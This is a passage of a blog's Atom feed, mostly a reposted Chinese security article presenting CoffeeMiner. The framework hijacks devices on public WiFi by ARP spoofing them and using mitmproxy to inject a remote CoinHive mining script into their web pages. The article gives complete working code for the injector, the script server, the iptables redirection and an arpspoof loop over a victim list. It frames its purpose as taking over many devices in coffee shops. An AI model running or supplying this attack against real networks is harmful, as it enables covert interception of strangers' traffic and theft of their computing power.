<p>Then add one line to the Dockerfile</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">COPY qemu-arm-static /usr/bin</span><br></pre></td></tr></table></figure>
<p><strong>It did absolutely nothing, though</strong></p></summary>
<category term="教程" scheme="https://thinkalone.win/categories/%E6%95%99%E7%A8%8B/"/>
<category term="教程" scheme="https://thinkalone.win/tags/%E6%95%99%E7%A8%8B/"/>
<category term="折腾那些事" scheme="https://thinkalone.win/tags/%E6%8A%98%E8%85%BE%E9%82%A3%E4%BA%9B%E4%BA%8B/"/>
</entry>
<entry>
<title>CoffeeMiner: a framework that hijacks devices on a WiFi network for “mining”</title>
<link href="https://thinkalone.win/CoffeeMiner.html"/>
<id>https://thinkalone.win/CoffeeMiner.html</id>
<published>2018-01-31T13:25:20.000Z</published>
<updated>2018-01-31T13:25:20.000Z</updated>
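<content type="html"><![CDATA[<p><strong>A few weeks ago I read reports online about hackers hijacking laptops on a Starbucks WiFi network for “mining”. I found it very interesting and, after some analysis, concluded that a similar result could be achieved with a man-in-the-middle (MITM) test. This article discusses how JavaScript can be injected into HTML pages via MITM so that devices connected to a public WiFi network become “mining” workers in a hacker's hands. In the end I write a working script called “CoffeeMiner” that can be used for anonymous penetration of public WiFi environments such as coffee shops, taking control of a large number of devices for “mining”.</strong></p><p><strong>Test scenario</strong></p><p>To achieve this on a public WiFi network, the CoffeeMiner tester has to intercept the traffic between the users and the router, as shown below:<br><img src="/pictures/CoffeeMiner/1.png"><br><strong>CoffeeMiner: a malicious framework that hijacks devices on a WiFi network for “mining”</strong></p><span id="more"></span><h2 id="场景设置"><a href="#场景设置" class="headerlink" title="场景设置"></a>Scenario setup</h2><p>In a real scenario, all kinds of smartphones and tablets are connected to the WiFi network. To make in-depth analysis easier, we built a virtual network environment for testing. It uses VirtualBox with Kali Linux installed in it; we install three Kali virtual machines, which play the following roles:</p><blockquote><p>Victim: connected to the WiFi router and browsing certain malicious pages<br>Tester: runs the CoffeeMiner tool and launches the MITM test</p></blockquote><p><strong>Router/gateway device: acts as an ordinary gateway</strong></p><p><img src="/pictures/CoffeeMiner/2.png"></p><p><strong>Once the test is launched, the scenario looks like this, with the victim's network traffic being hijacked:</strong></p><p><img src="/pictures/CoffeeMiner/3.png"></p><p>We configure the three virtual machines as follows:</p><p><strong>Victim</strong><br>Network adapter:</p><blockquote><p>eth0: Host-only Adapter<br>/etc/network/interfaces:<br> <img src="/pictures/CoffeeMiner/4.png"></p></blockquote><p><strong>Tester</strong><br>Network adapter:</p><blockquote><p>eth0: Host-only Adapter<br>/etc/network/interfaces:<br><img src="/pictures/CoffeeMiner/5.png"></p></blockquote><p><strong>Router/gateway device</strong><br>Network adapter:</p><blockquote><p>eth0: Bridged Adapter<br>eth1: Host-only Adapter<br>/etc/network/interfaces:<br><img src="/pictures/CoffeeMiner/6.png"></p></blockquote><h1 id="编写CoffeeMiner代码"><a href="#编写CoffeeMiner代码" class="headerlink" title="编写CoffeeMiner代码"></a>Writing the CoffeeMiner code</h1><p><strong>ARP spoofing module</strong><br>Here we use ARP spoofing to carry out the MITM test:</p><blockquote><p>In computer networking, ARP spoofing, ARP cache poisoning, or ARP poison routing is a technique in which the tester sends forged ARP messages on a local area network. Generally, the aim is to associate the tester's MAC address with the IP address of the default gateway or another host, so that any traffic meant for that IP address is forwarded to the tester's machine, enabling traffic interception, data theft and other malicious purposes.</p></blockquote><p><strong>To implement this we use arpspoof and the sniffing tool dsniff:</strong><br><img src="/pictures/CoffeeMiner/7.png"></p><h2 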
id="mitmproxy"><a href="#mitmproxy" class="headerlink" title="mitmproxy"></a>mitmproxy</h2><p>mitmproxy is a tool for analysing and editing traffic, and it can be used to carry out MITM tests. Here we use it to inject a JavaScript script into HTML pages. To keep things simple, we inject only one line of code into the HTML page; that line then remotely loads and runs the JavaScript mining script. The injected line is:</p><pre><code><script src="http://httpserverIP:8000/script.js"></script></code></pre><h2 id="Injector"><a href="#Injector" class="headerlink" title="Injector"></a>Injector</h2><p>Once the victim's network traffic has been intercepted, the script we built can be injected into it. To do the injection, we write the injector code with the mitmproxy API:</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> bs4 <span class="keyword">import</span> BeautifulSoup</span><br><span class="line"><span class="keyword">from</span> mitmproxy <span class="keyword">import</span> ctx, http</span><br><span class="line"><span class="keyword">import</span> argparse</span><br><span class="line"><span class="keyword">class</span> <span class="title class_">Injector</span>:</span><br><span class="line"> <span class="keyword">def</span> <span class="title function_">__init__</span>(<span class="params">self, path</span>):</span><br><span class="line"> <span class="variable language_">self</span>.path = 
path</span><br><span class="line"> <span class="keyword">def</span> <span class="title function_">response</span>(<span class="params">self, flow: http.HTTPFlow</span>) -> <span class="literal">None</span>:</span><br><span class="line"> <span class="keyword">if</span> <span class="variable language_">self</span>.path:</span><br><span class="line"> html = BeautifulSoup(flow.response.content, <span class="string">"html.parser"</span>)</span><br><span class="line"> <span class="built_in">print</span>(<span class="variable language_">self</span>.path)</span><br><span class="line"> <span class="built_in">print</span>(flow.response.headers[<span class="string">"content-type"</span>])</span><br><span class="line"> <span class="keyword">if</span> flow.response.headers[<span class="string">"content-type"</span>] == <span class="string">'text/html'</span>:</span><br><span class="line"> script = html.new_tag(</span><br><span class="line"> <span class="string">"script"</span>,</span><br><span class="line"> src=<span class="variable language_">self</span>.path,</span><br><span class="line"> <span class="built_in">type</span>=<span class="string">'application/javascript'</span>)</span><br><span class="line"> html.body.insert(<span class="number">0</span>, script)</span><br><span class="line"> flow.response.content = <span class="built_in">str</span>(html).encode(<span class="string">"utf8"</span>)</span><br><span class="line"> <span class="built_in">print</span>(<span class="string">"Script injected."</span>)</span><br><span class="line"><span class="keyword">def</span> <span class="title function_">start</span>():</span><br><span class="line"> parser = argparse.ArgumentParser()</span><br><span class="line"> parser.add_argument(<span class="string">"path"</span>, <span class="built_in">type</span>=<span class="built_in">str</span>)</span><br><span class="line"> args = parser.parse_args()</span><br><span class="line"><span class="keyword">return</span> 
Injector(args.path)</span><br></pre></td></tr></table></figure><h2 id="HTTP-Server"><a href="#HTTP-Server" class="headerlink" title="HTTP Server"></a>HTTP Server</h2><p>As described above, once the injector has added the line to the HTML page, the page calls the JavaScript mining script, so that script file has to be deployed on an HTTP server. To serve requests for the script, an HTTP server is set up on the tester's machine; for this we use Python's ‘http.server’ library:</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#!/usr/bin/env python</span></span><br><span class="line"><span class="keyword">import</span> http.server</span><br><span class="line"><span class="keyword">import</span> socketserver</span><br><span class="line"><span class="keyword">import</span> os</span><br><span class="line">PORT = <span class="number">8000</span></span><br><span class="line">web_dir = os.path.join(os.path.dirname(__file__), <span class="string">'miner_script'</span>)</span><br><span class="line">os.chdir(web_dir)</span><br><span class="line">Handler = http.server.SimpleHTTPRequestHandler</span><br><span class="line">httpd = socketserver.TCPServer((<span class="string">""</span>, PORT), Handler)</span><br><span class="line"><span class="built_in">print</span>(<span class="string">"serving at port"</span>, PORT)</span><br><span 
class="line">httpd.serve_forever()</span><br></pre></td></tr></table></figure><p>The code above is a simple HTTP server that hosts the mining service; the hosted script is placed in the /miner_script directory. To do the actual mining, I use CoinHive's JavaScript mining platform here.</p><p><strong>CoinHive miner</strong><br>Coinhive is in fact a Monero miner. It can be embedded in compromised websites controlled by the tester; whenever a user visits such a site, the user's CPU is used to compute cryptocurrency hashes for the CryptoNote protocol, and the user's computer indirectly becomes a “miner” for the tester.</p><p>The Coinhive miner only starts running 40 seconds after the victim opens the page, so if the victim stays on the page for less than 40 seconds, the Coinhive mining task has no effect. In this example I inject the mining script into every HTML page the victim requests, so there is certainly enough time.<br><img src="/pictures/CoffeeMiner/8.jpg"></p><h2 id="CoffeeMiner代码组合"><a href="#CoffeeMiner代码组合" class="headerlink" title="CoffeeMiner代码组合"></a>Putting the CoffeeMiner code together</h2><p>Once everything is ready, it can be deployed covertly on a WiFi network. Now let us look at how CoffeeMiner is implemented.<br>The CoffeeMiner script performs the ARP spoofing and uses mitmproxy to inject the CoinHive miner into the HTML pages the victim requests.<br>First, to turn the tester's host into an intermediate proxy, ip_forwarding and IPTABLES need to be configured:</p><p><img src="/pictures/CoffeeMiner/9.png"></p><p>To ARP-spoof all the victims, I use some Python code that reads every victim IP, with the IPs stored in a file named ‘victims.txt’, and then runs ARP spoofing against those IPs:</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#get gateway_ip</span></span><br><span class="line">gateway = sys.argv[<span class="number">1</span>]</span><br><span class="line"><span class="built_in">print</span>(<span class="string">"gateway: "</span> + gateway)</span><br><span class="line"><span class="comment">#get victims_ip</span></span><br><span class="line">victims = [line.rstrip(<span class="string">'\n'</span>) <span class="keyword">for</span> line <span class="keyword">in</span> <span class="built_in">open</span>(<span class="string">"victims.txt"</span>)]</span><br><span class="line"><span 
class="built_in">print</span>(<span class="string">"victims:"</span>)</span><br><span class="line"><span class="built_in">print</span>(victims)</span><br><span class="line"><span class="comment">#run the arpspoof for each victim, each one in a new console</span></span><br><span class="line"><span class="keyword">for</span> victim <span class="keyword">in</span> victims:</span><br><span class="line"> os.system(<span class="string">"xterm -e arpspoof -i eth0 -t "</span> + victim + <span class="string">" "</span> + gateway + <span class="string">" &"</span>)</span><br><span class="line"> os.system(<span class="string">"xterm -e arpspoof -i eth0 -t "</span> + gateway + <span class="string">" "</span> + victim + <span class="string">" &"</span>)</span><br></pre></td></tr></table></figure><p>Once the ARP spoofing has been started, just run the HTTP server:</p><blockquote><p>python3 httpServer.py</p></blockquote><p>After that, mitmproxy can be used to run the injector, injector.py:</p><blockquote><p>mitmdump -s ‘injector.py <a href="http://httpserverip:8000/script.js">http://httpserverIP:8000/script.js</a>‘</p></blockquote><h2 id="最终脚本"><a href="#最终脚本" class="headerlink" title="最终脚本"></a>Final script</h2><figure class="highlight python"><figcaption><span>coffeeMiner.py</span></figcaption><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span 
class="line"><span class="keyword">import</span> os</span><br><span class="line"><span class="keyword">import</span> sys</span><br><span class="line"><span class="comment">#get gateway_ip (router)</span></span><br><span class="line">gateway = sys.argv[<span class="number">1</span>]</span><br><span class="line"><span class="built_in">print</span>(<span class="string">"gateway: "</span> + gateway)</span><br><span class="line"><span class="comment">#get victims_ip</span></span><br><span class="line">victims = [line.rstrip(<span class="string">'\n'</span>) <span class="keyword">for</span> line <span class="keyword">in</span> <span class="built_in">open</span>(<span class="string">"victims.txt"</span>)]</span><br><span class="line"><span class="built_in">print</span>(<span class="string">"victims:"</span>)</span><br><span class="line"><span class="built_in">print</span>(victims)</span><br><span class="line"><span class="comment">#configure routing (IPTABLES)</span></span><br><span class="line">os.system(<span class="string">"echo 1 > /proc/sys/net/ipv4/ip_forward"</span>)</span><br><span class="line">os.system(<span class="string">"iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE"</span>)</span><br><span class="line">os.system(<span class="string">"iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080"</span>)</span><br><span class="line">os.system(<span class="string">"iptables -t nat -A PREROUTING -p tcp --destination-port 443 -j REDIRECT --to-port 8080"</span>)</span><br><span class="line"><span class="comment">#run the arpspoof for each victim, each one in a new console</span></span><br><span class="line"><span class="keyword">for</span> victim <span class="keyword">in</span> victims:</span><br><span class="line"> os.system(<span class="string">"xterm -e arpspoof -i eth0 -t "</span> + victim + <span class="string">" "</span> + gateway + <span class="string">" &"</span>)</span><br><span class="line"> os.system(<span 
class="string">"xterm -e arpspoof -i eth0 -t "</span> + gateway + <span class="string">" "</span> + victim + <span class="string">" &"</span>)</span><br><span class="line"><span class="comment">#start the http server for serving the script.js, in a new console</span></span><br><span class="line">os.system(<span class="string">"xterm -hold -e 'python3 httpServer.py' &"</span>)</span><br><span class="line"><span class="comment">#start the mitmproxy</span></span><br><span class="line">os.system(<span class="string">"~/.local/bin/mitmdump -s 'injector.py http://10.0.2.20:8000/script.js' -T"</span>)</span><br></pre></td></tr></table></figure><figure class="highlight python"><figcaption><span>injector.py</span></figcaption><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> bs4 <span class="keyword">import</span> BeautifulSoup</span><br><span class="line"><span class="keyword">from</span> mitmproxy <span class="keyword">import</span> ctx, http</span><br><span class="line"><span class="keyword">import</span> argparse</span><br><span class="line"><span class="keyword">class</span> <span class="title 
class_">Injector</span>:</span><br><span class="line"> <span class="keyword">def</span> <span class="title function_">__init__</span>(<span class="params">self, path</span>):</span><br><span class="line"> <span class="variable language_">self</span>.path = path</span><br><span class="line"> <span class="keyword">def</span> <span class="title function_">response</span>(<span class="params">self, flow: http.HTTPFlow</span>) -> <span class="literal">None</span>:</span><br><span class="line"> <span class="keyword">if</span> <span class="variable language_">self</span>.path:</span><br><span class="line"> html = BeautifulSoup(flow.response.content, <span class="string">"html.parser"</span>)</span><br><span class="line"> <span class="built_in">print</span>(<span class="variable language_">self</span>.path)</span><br><span class="line"> <span class="built_in">print</span>(flow.response.headers[<span class="string">"content-type"</span>])</span><br><span class="line"> <span class="keyword">if</span> flow.response.headers[<span class="string">"content-type"</span>] == <span class="string">'text/html'</span>:</span><br><span class="line"> <span class="built_in">print</span>(flow.response.headers[<span class="string">"content-type"</span>])</span><br><span class="line"> script = html.new_tag(</span><br><span class="line"> <span class="string">"script"</span>,</span><br><span class="line"> src=<span class="variable language_">self</span>.path,</span><br><span class="line"> <span class="built_in">type</span>=<span class="string">'application/javascript'</span>)</span><br><span class="line"> html.body.insert(<span class="number">0</span>, script)</span><br><span class="line"> flow.response.content = <span class="built_in">str</span>(html).encode(<span class="string">"utf8"</span>)</span><br><span class="line"> <span class="built_in">print</span>(<span class="string">"Script injected."</span>)</span><br><span class="line"><span class="keyword">def</span> <span class="title 
function_">start</span>():</span><br><span class="line"> parser = argparse.ArgumentParser()</span><br><span class="line"> parser.add_argument(<span class="string">"path"</span>, <span class="built_in">type</span>=<span class="built_in">str</span>)</span><br><span class="line"> args = parser.parse_args()</span><br><span class="line"> <span class="keyword">return</span> Injector(args.path)</span><br></pre></td></tr></table></figure><h2 id="测试执行操作:"><a href="#测试执行操作:" class="headerlink" title="测试执行操作:"></a>Running the test:</h2><blockquote><p>python3 coffeeMiner.py RouterIP</p></blockquote><h2 id="测试演示"><a href="#测试演示" class="headerlink" title="测试演示"></a>Test demonstration</h2><p>We run the demonstration in a virtual-machine environment, starting with a manual test in the terminal:</p><p><img src="/pictures/CoffeeMiner/10.png"></p><p>Once the ARP spoofing is running and the injector and the HTTP server are ready, as soon as the victim visits the malicious web page, all of their network traffic is forwarded to the tester's machine and the injection is triggered:</p><p><img src="/pictures/CoffeeMiner/11.png"></p><p>As a result, the pages the victim browses are injected with code that calls the malicious mining service:</p><p><img src="/pictures/CoffeeMiner/12.gif"></p><h2 id="总结"><a href="#总结" class="headerlink" title="总结"></a>Summary</h2><p>As shown above, hackers can very easily launch covert malicious activity on a WiFi network, taking control of a large number of connected devices and using them for “mining”. Typically, WiFi networks with a strong signal are the ones hackers may exploit; in addition, hackers might also add Nmap scanning and sslstrip functionality to the program. The complete CoffeeMiner code is available at <a href="https://github.com/arnaucode/coffeeMiner">https://github.com/arnaucode/coffeeMiner</a></p><blockquote><p>Reposted from FreeBuf.COM <a href="http://www.freebuf.com/articles/wireless/159688.html">http://www.freebuf.com/articles/wireless/159688.html</a></p></blockquote>]]></content>
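<summary type="html"><p><strong>A few weeks ago I saw reports online about hackers hijacking laptops on a Starbucks WiFi network for “mining”, which I found very interesting. After some analysis, I believe a similar goal can also be achieved with a man-in-the-middle (MITM) test. In this article we discuss how to inject JavaScript into HTML pages via MITM so that devices connected to public WiFi become “mining” workers in a hacker's hands. In the end I will write a working script called “CoffeeMiner”, which can be used for anonymous penetration in public WiFi environments such as coffee shops, with the aim of taking control of a large number of devices for “mining”.</strong></p>
<p><strong>Test scenario</strong></p>
<p>To achieve this on a public WiFi network, the CoffeeMiner tester has to try to intercept the traffic between the users and the router, as shown below:<br><img src="/pictures/CoffeeMiner/1.png"><br><strong>CoffeeMiner: a malicious framework that hijacks devices connected to a WiFi network for “mining”</strong></p></summary>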
<category term="网络安全" scheme="https://thinkalone.win/categories/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/"/>
<category term="网络安全" scheme="https://thinkalone.win/tags/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/"/>
<category term="教程" scheme="https://thinkalone.win/tags/%E6%95%99%E7%A8%8B/"/>
</entry>
</feed>